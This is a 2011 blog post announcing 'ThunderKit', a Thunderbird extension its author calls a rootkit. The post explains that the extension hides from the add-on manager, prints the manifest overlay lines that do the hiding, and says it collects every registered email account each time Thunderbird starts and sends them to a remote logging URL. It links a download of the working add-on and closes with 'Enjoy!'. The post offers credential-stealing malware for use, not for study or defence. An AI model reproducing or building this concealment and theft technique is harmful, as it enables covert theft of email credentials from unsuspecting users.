Wednesday, October 26, 2011

ThunderKit – Thunderbird Rootkit

It's been a while since i post something in this blog, from now on i'll try to be more regular.
Well, today i brought to you the thunderkit the very first thunderbird rootkit, this is really nothing new, except the extension hide method which is compatible the more recent thunderbird and firefox versions.

Thunderkit is a very simple rootkit that have the capacity to hide himself from the thunderbird and retrieve all registered accounts from the current profile every time the victim starts thunderbird and sends them to a target log script, based on a url.

The rootkit can hide himself by setting a overlay on “about:addons”, the addon manager of the thunderbird, which is the same in firefox, and has the support of the previous versions.

# Thunderbird 2
overlay    chrome://mozapps/content/extensions/extensions.xul    chrome://thunderkit/content/hidden.xul

overlay    chrome://mozapps/content/extensions/extensions.xul?type=extensions    chrome://thunderkit/content/hidden.xul

# Thunderbird 3
overlay about:addons    chrome://thunderkit/content/hidden.xul  

Thunderkit was tested with the latest version of Thunderbird (7.0), but i think that works in other previous versions too, at least all versions with the XHR support.

Download Addon (unpack to view the source (xpi = zip))

Enjoy!